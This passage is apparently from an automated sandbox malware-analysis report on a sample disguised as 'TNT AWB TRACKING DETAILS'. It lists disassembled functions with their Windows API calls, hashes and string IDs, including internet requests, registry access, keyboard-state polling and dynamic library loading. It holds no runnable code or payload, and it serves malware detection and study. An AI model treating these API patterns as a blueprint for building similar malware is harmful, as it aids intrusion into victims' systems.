                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: c5cc75d55ef11ea5d23da5d9163718192c6b092bb2cc6f2a8099261246e9cb4e
                                                    • Instruction ID: 5528dff6016b59b576e8237522880207a38085486f203156af00a9ce7ca4679b
                                                    • Opcode Fuzzy Hash: c5cc75d55ef11ea5d23da5d9163718192c6b092bb2cc6f2a8099261246e9cb4e
                                                    • Instruction Fuzzy Hash: 45F0BE3A440616EBE7112B24EC4C9DB7769EF57312B000131F907900A0CBBA1904EB60
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F1899D
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00F189A9
                                                    • CloseHandle.KERNEL32(?), ref: 00F189B2
                                                    • CloseHandle.KERNEL32(?), ref: 00F189BA
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F189C3
                                                    • HeapFree.KERNEL32(00000000), ref: 00F189CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 097709a51ee3ff41d6b52a20f3e835bea2f0c115cc775cb3a28788c7e257b600
                                                    • Instruction ID: 844b9db640589b1e8f2fce8aa768e66a8427e54c5ac9a487c2069aabbd8d6293
                                                    • Opcode Fuzzy Hash: 097709a51ee3ff41d6b52a20f3e835bea2f0c115cc775cb3a28788c7e257b600
                                                    • Instruction Fuzzy Hash: 0FE0C93A004009FBE6011FE1EC0C916BBA9FBAA7227104230F61981470CB325424EB50
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F38613
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F38722
                                                    • VariantClear.OLEAUT32(?), ref: 00F3889A
                                                      • Part of subcall function 00F27562: VariantInit.OLEAUT32(00000000), ref: 00F275A2
                                                      • Part of subcall function 00F27562: VariantCopy.OLEAUT32(00000000,?), ref: 00F275AB
                                                      • Part of subcall function 00F27562: VariantClear.OLEAUT32(00000000), ref: 00F275B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: d38a8864e790a306af52c4bd12bab2b009ce3523a705ac7c594c575c9b22e0ef
                                                    • Instruction ID: 9c7ea8ba059b076baff9d6e9bedff07238348026e98993fb7f3b352b39eea005
                                                    • Opcode Fuzzy Hash: d38a8864e790a306af52c4bd12bab2b009ce3523a705ac7c594c575c9b22e0ef
                                                    • Instruction Fuzzy Hash: FB91BF71A04301DFCB00DF24C48595ABBE4EF89764F04886DF89A9B362DB35EC46DB52
                                                    APIs
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                    • _memset.LIBCMT ref: 00F22B87
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F22BB6
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F22C69
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F22C97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: 98859674c609735ed5abd4ff4d956113c434bcace4a817670f6b41835d0e93cb
                                                    • Instruction ID: 6d57fbcf03c734a26d9cc8c6e07eafa50dc664c04f435cc50cf9b52304a9ab27
                                                    • Opcode Fuzzy Hash: 98859674c609735ed5abd4ff4d956113c434bcace4a817670f6b41835d0e93cb
                                                    • Instruction Fuzzy Hash: E351D371908320ABD7A4AF28E845A6F77E4EF95330F040A2DF895E72A1DB74CD44A752
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_free
                                                    • String ID: 3c$_
                                                    • API String ID: 2620147621-4099079164
                                                    • Opcode ID: 4a4cfbd1c5705831b9e8bcb4121c13949052036b73e4455b8a88dccbea96081a
                                                    • Instruction ID: f40799a2d3430ed4fabeb613ed7ee957dc8340c6cfcea6ce2da8309ad3ca6e0c
                                                    • Opcode Fuzzy Hash: 4a4cfbd1c5705831b9e8bcb4121c13949052036b73e4455b8a88dccbea96081a
                                                    • Instruction Fuzzy Hash: 04516871A043418FDB24CF28C940A6EBBE5EF85314F44582EE999E7351EB35E942CB43
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: 3c$ERCP
                                                    • API String ID: 2532777613-1756721700
                                                    • Opcode ID: 3d355db1be01279d6458a7160fe10bfb92cc335270752d3d2e3830ac355f3e56
                                                    • Instruction ID: 60486430f7925fdd6dba3b54eee5de72f2fc3db71a72f73c3177ad9bb7a102db
                                                    • Opcode Fuzzy Hash: 3d355db1be01279d6458a7160fe10bfb92cc335270752d3d2e3830ac355f3e56
                                                    • Instruction Fuzzy Hash: 2F51A171900309DBDB24CF95C941BEAB7F4EF44314F20956FE54AEB251E7B0AA85DB40
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F1D5D4
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F1D60A
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F1D61B
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F1D69D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: DllGetClassObject
                                                    • API String ID: 753597075-1075368562
                                                    • Opcode ID: 5d94d748c103a6bbba847c9b4502af4fdb377cb842196f57750c531ad3669077
                                                    • Instruction ID: cdeb759e147366b894087d3ea4a1a57b167022174022558d76f39b16cc9a361d
                                                    • Opcode Fuzzy Hash: 5d94d748c103a6bbba847c9b4502af4fdb377cb842196f57750c531ad3669077
                                                    • Instruction Fuzzy Hash: 16419FB2600204EFDB05DF64C884BDA7BB9EF44314F1581A9ED099F24AD7B1DD84EBA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F227C0
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F227DC
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F22822
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F85890,00000000), ref: 00F2286B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: d62eee754ac5f99fb4761e6030e9d70f4ea9516e29ccc350e74abeb2cfcc3e31
                                                    • Instruction ID: 3f1320756f60794d3af0a6b12f684de2f7fe8c7ff9f15eb15647b9cd64435a65
                                                    • Opcode Fuzzy Hash: d62eee754ac5f99fb4761e6030e9d70f4ea9516e29ccc350e74abeb2cfcc3e31
                                                    • Instruction Fuzzy Hash: F141EF71604351AFD760DF24EC44FAABBE8EF85320F04492EF8A697291C770E805DB52
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F3D7C5
                                                      • Part of subcall function 00EC784B: _memmove.LIBCMT ref: 00EC7899
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower_memmove
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 3425801089-567219261
                                                    • Opcode ID: 06c41d71f33124f520fc5edc888f9998c1b6d07c070fa4c7d2e681af7c07fa70
                                                    • Instruction ID: ce175379ebc1715163bf7a382b8cd2fd6dafc44efaff3a43d920458a1ce97759
                                                    • Opcode Fuzzy Hash: 06c41d71f33124f520fc5edc888f9998c1b6d07c070fa4c7d2e681af7c07fa70
                                                    • Instruction Fuzzy Hash: 9931B071904219ABCF00EFA4CD519AEB3F4FF04330F00866AE869A72D1DB71A946DB80
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F18F14
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F18F27
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F18F57
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 365058703-1403004172
                                                    • Opcode ID: 4f9437adab567ecad2ccc7cbfabe0fdcf3a2f3a6efb1486ae3a301f2115a4a08
                                                    • Instruction ID: 7a2fc6957893b1ee1d1d76edfb6aad707483552576ebca2bace629a0fceb3bb6
                                                    • Opcode Fuzzy Hash: 4f9437adab567ecad2ccc7cbfabe0fdcf3a2f3a6efb1486ae3a301f2115a4a08
                                                    • Instruction Fuzzy Hash: A5210675901108BADB14ABB0CD85DFF77A9DF463A0F14412DF825A71E0DF39588BAA10
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F3184C
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F31872
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F318A2
                                                    • InternetCloseHandle.WININET(00000000), ref: 00F318E9
                                                      • Part of subcall function 00F32483: GetLastError.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F32498
                                                      • Part of subcall function 00F32483: SetEvent.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F324AD
                                                    Strings
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 711024574c0c1207ac848f99f1dcec9ecd92af98873767d4495173cb1a4ec956
                                                    • Instruction ID: 762211e27876f925e1d4776c85857e57a6593d79602366fd67326aa27bebb265
                                                    • Opcode Fuzzy Hash: 711024574c0c1207ac848f99f1dcec9ecd92af98873767d4495173cb1a4ec956
                                                    • Instruction Fuzzy Hash: C921BEB190020CBFEB119B64CC85EBF77EDFB49764F10412AF805A2240EA288D08A7B4
                                                    APIs
                                                      • Part of subcall function 00EC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EC1D73
                                                      • Part of subcall function 00EC1D35: GetStockObject.GDI32(00000011), ref: 00EC1D87
                                                      • Part of subcall function 00EC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC1D91
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F46461
                                                    • LoadLibraryW.KERNEL32(?), ref: 00F46468
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F4647D
                                                    • DestroyWindow.USER32(?), ref: 00F46485
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 30a43d1ac39c1b804e6f161c7e0c6c26d3b6344efb76f56dd08410082f689266
                                                    • Instruction ID: 53230b49e7014f50192c3e147167df13a637c33f13e76046100354e3b6c52822
                                                    • Opcode Fuzzy Hash: 30a43d1ac39c1b804e6f161c7e0c6c26d3b6344efb76f56dd08410082f689266
                                                    • Instruction Fuzzy Hash: 17218E75500209ABEF108FA4DC40EBA3BA9EB5A374F104629FD14D21A0D775DC51B762
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F26DBC
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F26DEF
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F26E01
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F26E3B
                                                    Strings
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: d1b7aa178d013db379703c91a3d7257b23f7c77639ca6513886e79cc4a3a64ed
                                                    • Instruction ID: 4bce29c621f432d4d7352eaff55757532d44c1e3250fcb6ccd84987c975dd0df
                                                    • Opcode Fuzzy Hash: d1b7aa178d013db379703c91a3d7257b23f7c77639ca6513886e79cc4a3a64ed
                                                    • Instruction Fuzzy Hash: CB21B275A0022DABDB209F69EC04A9A77F4EF95730F204A19FCA0D72D0D7709915AB54
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F26E89
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F26EBB
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F26ECC
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F26F06
                                                    Strings
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: ed8d6e9d5673b17ebdea62a1223daeecadacef2146f8c42865ae5d5c434e3989
                                                    • Instruction ID: 4e8a0c04c05d8f5ead7adc399ed90ac45c860fe2a9dd4a14e2ac952bdd192aa0
                                                    • Opcode Fuzzy Hash: ed8d6e9d5673b17ebdea62a1223daeecadacef2146f8c42865ae5d5c434e3989
                                                    • Instruction Fuzzy Hash: 512107799007259BDB209F69EC04A9A77E8EF55730F200B19FCA0D72D0D7B0E951EB54
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2AC54
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F2ACA8
                                                    • __swprintf.LIBCMT ref: 00F2ACC1
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F4F910), ref: 00F2ACFF
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 7c0be13f2347b30e62b71e3cd656ce6d9b765047c43c173c39511f6e122ad5b4
                                                    • Instruction ID: 99ea6e364089ae011704aa32e16b0ec8a628da37b90b0a6651f0cfdf2fae2ed0
                                                    • Opcode Fuzzy Hash: 7c0be13f2347b30e62b71e3cd656ce6d9b765047c43c173c39511f6e122ad5b4
                                                    • Instruction Fuzzy Hash: ED21A135A0010DAFCB10DF64DD45EAE7BF8EF89314B0040A9F909EB252DA31EA45DB21
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F21B19
                                                    Strings
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: 6d049b25f74ad8ec22d3198ac3dbce4545eb31f0bc910d8c33158b346dad3fb3
                                                    • Instruction ID: 0c8006cb0e839eb07be04651253bb61f883611f4ed89b9eebbd091d48838a336
                                                    • Opcode Fuzzy Hash: 6d049b25f74ad8ec22d3198ac3dbce4545eb31f0bc910d8c33158b346dad3fb3
                                                    • Instruction Fuzzy Hash: 78118B3194029C8FCF00EFA4E8519EEB3F4FF66314B1484A9D818A7692EB325D47EB54
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F3EC07
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F3EC37
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F3ED6A
                                                    • CloseHandle.KERNEL32(?), ref: 00F3EDEB
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 1e894255bba1be060884453df87cac8ec306be0f009db708da8141d25eec6cf7
                                                    • Instruction ID: 91c3f51db11eb41b1fc9fcc9a3b230f025e71e56ee0fe9e5a2504ce605c29f75
                                                    • Opcode Fuzzy Hash: 1e894255bba1be060884453df87cac8ec306be0f009db708da8141d25eec6cf7
                                                    • Instruction Fuzzy Hash: F78151716043009FD724EF28C946F6AB7E5AF94720F14881DF99AEB2D2DA71AC41CB52
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F400FD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F4013C
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F40183
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F401AF
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F401BC
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: f9f473f7f759cf0c4fafa96db4365c7dc429b067da1d9347d136568881b6a0a0
                                                    • Instruction ID: 94c70de022ab45297830acd7aaf67c598299b6cbbd3d20bd800bf6952468011d
                                                    • Opcode Fuzzy Hash: f9f473f7f759cf0c4fafa96db4365c7dc429b067da1d9347d136568881b6a0a0
                                                    • Instruction Fuzzy Hash: A8517C72608204AFD704EF68CD81F6ABBE9FF84314F00492DF995972A2DB31E945DB52
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F3D927
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F3D9AA
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F3D9C6
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F3DA07
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F3DA21
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F27896,?,?,00000000), ref: 00EC5A2C
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F27896,?,?,00000000,?,?), ref: 00EC5A50
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: 844cc69a2ed964f3c6133ae4b008d5e1111061051b3712675729d50869723f98
                                                    • Instruction ID: cc28fc60bbb0c9524f440b524bdad14f5af4e14f33d46ba68e5ade7ff3742655
                                                    • Opcode Fuzzy Hash: 844cc69a2ed964f3c6133ae4b008d5e1111061051b3712675729d50869723f98
                                                    • Instruction Fuzzy Hash: 6B510636A00209DFCB00EFA8D584EADB7F5FF59320B048069E859AB312DB35AD46DB50
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F2E61F
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F2E648
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F2E687
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F2E6AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F2E6B4
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00EC2357
                                                    • ScreenToClient.USER32(00F857B0,?), ref: 00EC2374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00EC2399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 00EC23A7
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F163E7
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00F16433
                                                    • TranslateMessage.USER32(?), ref: 00F1645C
                                                    • DispatchMessageW.USER32(?), ref: 00F16466
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F16475
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F18A30
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00F18ADA
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F18AE2
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00F18AF0
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F18AF8
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00F1B204
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F1B221
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F1B259
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F1B27F
                                                    • _wcsstr.LIBCMT ref: 00F1B289
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4B192
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F4B1B7
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F4B1CF
